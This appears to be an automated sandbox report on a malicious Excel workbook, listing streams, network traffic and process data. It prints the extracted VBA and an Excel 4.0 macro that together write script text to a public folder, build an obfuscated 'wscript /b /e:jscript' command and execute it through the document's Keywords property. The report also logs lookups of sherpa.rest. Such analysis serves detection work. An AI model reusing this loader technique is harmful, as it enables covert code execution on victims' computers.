                                                                                                                                                          Stream Size:985

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          False
                                                                                                                                                          VB_Exposed
                                                                                                                                                          Attribute
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          "ThisWorkbook"
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          VB_Customizable
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "ThisWorkbook"
                                                                                                                                                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = True
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = True
                                                                                                                                                          VBA File Name: UserForm1.frm, Stream Size: 2834
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/UserForm1
                                                                                                                                                          VBA File Name:UserForm1.frm
                                                                                                                                                          Stream Size:2834

                                                                                                                                                          VBA Code Keywords

                                                                                                                                                          Keyword
                                                                                                                                                          #FileNumber
                                                                                                                                                          requirement
                                                                                                                                                          Close
                                                                                                                                                          Error
                                                                                                                                                          VB_Name
                                                                                                                                                          VB_Creatable
                                                                                                                                                          /one"
                                                                                                                                                          VB_Exposed
                                                                                                                                                          xFileName
                                                                                                                                                          Print
                                                                                                                                                          FileNumber
                                                                                                                                                          Empty
                                                                                                                                                          String
                                                                                                                                                          Resume
                                                                                                                                                          Variant
                                                                                                                                                          Output
                                                                                                                                                          "c:\Users\Public"
                                                                                                                                                          VB_Customizable
                                                                                                                                                          #FileNumber,
                                                                                                                                                          ":jsoncronipont
                                                                                                                                                          Replace("wsconroniponton
                                                                                                                                                          "\Documents\"
                                                                                                                                                          Range
                                                                                                                                                          Dir(Path)
                                                                                                                                                          Integer
                                                                                                                                                          DelimChar
                                                                                                                                                          VB_TemplateDerived
                                                                                                                                                          False
                                                                                                                                                          ThisWorkbook.BuiltinDocumentProperties("Keywords")
                                                                                                                                                          Attribute
                                                                                                                                                          Debug.Print
                                                                                                                                                          Private
                                                                                                                                                          VB_PredeclaredId
                                                                                                                                                          VB_GlobalNameSpace
                                                                                                                                                          VB_Base
                                                                                                                                                          'Change
                                                                                                                                                          FreeFile
                                                                                                                                                          strFileExists
                                                                                                                                                          VBA Code
                                                                                                                                                          Attribute VB_Name = "UserForm1"
                                                                                                                                                          Attribute VB_Base = "0{C840727C-B23E-46C1-9026-1DED0360EC96}{F47D3FAE-BB8B-4706-8591-BD6CC07461DA}"
                                                                                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                                                                                          Attribute VB_Creatable = False
                                                                                                                                                          Attribute VB_PredeclaredId = True
                                                                                                                                                          Attribute VB_Exposed = False
                                                                                                                                                          Attribute VB_TemplateDerived = False
                                                                                                                                                          Attribute VB_Customizable = False
                                                                                                                                                          Private Sub TextBox1_Change()
                                                                                                                                                           Dim Path As String
                                                                                                                                                           Dim FileNumber As Integer
                                                                                                                                                           
                                                                                                                                                           Dim xFileName As Variant
                                                                                                                                                              Dim rng As Range
                                                                                                                                                              Dim DelimChar As String
                                                                                                                                                            On Error Resume Next
                                                                                                                                                           tgo = "on"
                                                                                                                                                           Path = "c:\Users\Public" & Empty & "\Documents\" & "25" & Empty  'Change the path as per your requirement
                                                                                                                                                           FileNumber = FreeFile
                                                                                                                                                           Open Path For Output As #FileNumber
                                                                                                                                                           Print #FileNumber, Me.TextBox1.Value
                                                                                                                                                           Close FileNumber
                                                                                                                                                          
                                                                                                                                                           ThisWorkbook.Sheets(2).Activate
                                                                                                                                                           ThisWorkbook.Sheets(2).Range("D50:IV666").Clear
                                                                                                                                                           
                                                                                                                                                              
                                                                                                                                                          strFileExists = Dir(Path)
                                                                                                                                                          
                                                                                                                                                             If strFileExists = "" Then
                                                                                                                                                                  Debug.Print "x"
                                                                                                                                                              Else
                                                                                                                                                                   
                                                                                                                                                           ThisWorkbook.BuiltinDocumentProperties("Keywords") = "w" & Replace("wsconroniponton /bon /one" & ":jsoncronipont ", tgo, "", 2) & Path
                                                                                                                                                          
                                                                                                                                                              End If
                                                                                                                                                           
                                                                                                                                                          End Sub

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x1CompObj
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:107
                                                                                                                                                          Entropy:4.18482950044
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 424
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:424
                                                                                                                                                          Entropy:3.70704949759
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 220
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:220
                                                                                                                                                          Entropy:3.13229188015
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 39260
                                                                                                                                                          General
                                                                                                                                                          Stream Path:Workbook
                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                          Stream Size:39260
                                                                                                                                                          Entropy:4.61059933587
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Stream Path: _SX_DB_CUR/0001, File Type: data, Stream Size: 16815
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_SX_DB_CUR/0001
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:16815
                                                                                                                                                          Entropy:2.76744715124
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 826
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Stream Size:826
                                                                                                                                                          Entropy:5.15315553776
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 176
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:176
                                                                                                                                                          Entropy:3.18343768922
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/UserForm1/\x1CompObj
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:97
                                                                                                                                                          Entropy:3.61064918306
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 291
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/UserForm1/\x3VBFrame
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Stream Size:291
                                                                                                                                                          Entropy:4.60170100243
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 171
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/UserForm1/f
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:171
                                                                                                                                                          Entropy:3.84288648278
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 108
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/UserForm1/o
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:108
                                                                                                                                                          Entropy:3.31418568251
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4896
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:4896
                                                                                                                                                          Entropy:4.8370296249
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1828
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:1828
                                                                                                                                                          Entropy:4.3476580333
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 191
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:191
                                                                                                                                                          Entropy:3.30829134406
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:r U . . . . . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s e c o n d s . . . . . . . . D e l i m i t e r . . . . . . . . I g n o r e _ E m p t y . . . . . . . . T e x t 1 a . . . . . . .
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 384
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:384
                                                                                                                                                          Entropy:2.45306416855
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 294
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:294
                                                                                                                                                          Entropy:2.65487119554
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: MIPSEL-BE Ucode, Stream Size: 902
                                                                                                                                                          General
                                                                                                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                                          File Type:MIPSEL-BE Ucode
                                                                                                                                                          Stream Size:902
                                                                                                                                                          Entropy:6.58076213885
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . B . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -

                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                          "=RETURN(EXEC(GET.WORKBOOK(36,DOCUMENTS(1))))",,=1+1

                                                                                                                                                          Network Behavior

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets


                                                                                                                                                          UDP Packets

                                                                                                                                                          Nov 19, 2020 08:55:21.364162922 CET5423053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:21.377136946 CET53542308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.002232075 CET4995853192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:22.031665087 CET53499588.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.379714966 CET5423053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:22.393177032 CET53542308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:22.810425997 CET5086053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:22.828685045 CET53508608.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:23.053925037 CET5045253192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:23.066096067 CET53504528.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:24.380263090 CET5423053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:24.393002033 CET53542308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:24.442250013 CET5945153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:24.455365896 CET53594518.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:28.395911932 CET5423053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:28.408533096 CET53542308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:31.556031942 CET5973053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:31.568850040 CET53597308.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:37.624082088 CET5931053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:37.637690067 CET53593108.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:41.137947083 CET5191953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:41.151437044 CET53519198.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:42.451525927 CET6429653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:42.463757992 CET53642968.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:43.444963932 CET5668053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:43.459101915 CET53566808.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:45.399720907 CET5882053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:45.412800074 CET53588208.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:46.884980917 CET6098353192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:46.898097992 CET53609838.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:53.072124958 CET4924753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:53.090845108 CET53492478.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:53.560739040 CET5228653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:53.573664904 CET53522868.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:55.765737057 CET5606453192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:55.779037952 CET53560648.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:56.226586103 CET6374453192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:56.239907026 CET53637448.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:56.349257946 CET6145753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:56.362277031 CET53614578.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:56.701160908 CET5836753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:56.721797943 CET53583678.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:57.046128035 CET6059953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:57.059211016 CET53605998.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:57.128667116 CET5957153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:57.141024113 CET53595718.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:57.522999048 CET5268953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:57.535382032 CET53526898.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:57.718154907 CET5029053192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:57.745742083 CET53502908.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:57.947175026 CET6042753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:57.960751057 CET53604278.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:58.415807962 CET5620953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:58.428867102 CET53562098.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:55:59.124157906 CET5958253192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:55:59.137289047 CET53595828.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:00.187294006 CET6094953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:00.200376987 CET53609498.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:00.803838015 CET5854253192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:00.816900015 CET53585428.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:03.864377022 CET5917953192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:03.884466887 CET53591798.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:32.229438066 CET6092753192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:32.263771057 CET53609278.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:34.892143011 CET5785453192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:34.904783964 CET53578548.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:56:54.737792969 CET6202653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:56:54.750781059 CET53620268.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:49.896569967 CET5945353192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:49.909166098 CET53594538.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:50.216155052 CET6246853192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:50.228629112 CET53624688.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:50.648753881 CET5256353192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:50.674897909 CET53525638.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:54.137573957 CET5472153192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:54.171084881 CET53547218.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:57.826704979 CET6282653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:57.853064060 CET53628268.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 08:59:58.106853962 CET6204653192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 08:59:58.120014906 CET53620468.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 09:00:14.674246073 CET5122353192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 09:00:14.722126007 CET53512238.8.8.8192.168.2.7
                                                                                                                                                          Nov 19, 2020 09:01:57.797785044 CET6390853192.168.2.78.8.8.8
                                                                                                                                                          Nov 19, 2020 09:01:57.810509920 CET53639088.8.8.8192.168.2.7

                                                                                                                                                          DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Nov 19, 2020 08:55:19.811559916 CET | 192.168.2.7 | 8.8.8.8 | 0xa688 | Standard query (0) | sherpa.rest | A (IP address) | IN (0x0001) |
| Nov 19, 2020 08:55:22.002232075 CET | 192.168.2.7 | 8.8.8.8 | 0x84a7 | Standard query (0) | sherpa.rest | A (IP address) | IN (0x0001) |

                                                                                                                                                          DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Nov 19, 2020 08:55:19.847448111 CET | 8.8.8.8 | 192.168.2.7 | 0xa688 | No error (0) | sherpa.rest | | 104.27.172.15 | A (IP address) | IN (0x0001) |
| Nov 19, 2020 08:55:19.847448111 CET | 8.8.8.8 | 192.168.2.7 | 0xa688 | No error (0) | sherpa.rest | | 104.27.173.15 | A (IP address) | IN (0x0001) |
| Nov 19, 2020 08:55:19.847448111 CET | 8.8.8.8 | 192.168.2.7 | 0xa688 | No error (0) | sherpa.rest | | 172.67.221.76 | A (IP address) | IN (0x0001) |
| Nov 19, 2020 08:55:22.031665087 CET | 8.8.8.8 | 192.168.2.7 | 0x84a7 | No error (0) | sherpa.rest | | 172.67.221.76 | A (IP address) | IN (0x0001) |
| Nov 19, 2020 08:55:22.031665087 CET | 8.8.8.8 | 192.168.2.7 | 0x84a7 | No error (0) | sherpa.rest | | 104.27.173.15 | A (IP address) | IN (0x0001) |
| Nov 19, 2020 08:55:22.031665087 CET | 8.8.8.8 | 192.168.2.7 | 0x84a7 | No error (0) | sherpa.rest | | 104.27.172.15 | A (IP address) | IN (0x0001) |

                                                                                                                                                          HTTPS Packets

| Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 19, 2020 08:55:19.911746025 CET | 104.27.172.15 | 443 | 192.168.2.7 | 49719 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Sun Nov 01 01:00:00 CET 2020 | Mon Nov 01 00:59:59 CET 2021 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0 | ce5f3254611a8c095a3d821d44539877 |
| | | | | | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 | | |
| Nov 19, 2020 08:55:22.100061893 CET | 172.67.221.76 | 443 | 192.168.2.7 | 49723 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Sun Nov 01 01:00:00 CET 2020 | Mon Nov 01 00:59:59 CET 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
| | | | | | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025 | | |

                                                                                                                                                          Code Manipulations

                                                                                                                                                          System Behavior

                                                                                                                                                          General

Start time: 08:55:15
Start date: 19/11/2020
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0xaf0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                          General

Start time: 08:55:19
Start date: 19/11/2020
Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase: 0xf40000
File size: 466688 bytes
MD5 hash: EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

                                                                                                                                                          Disassembly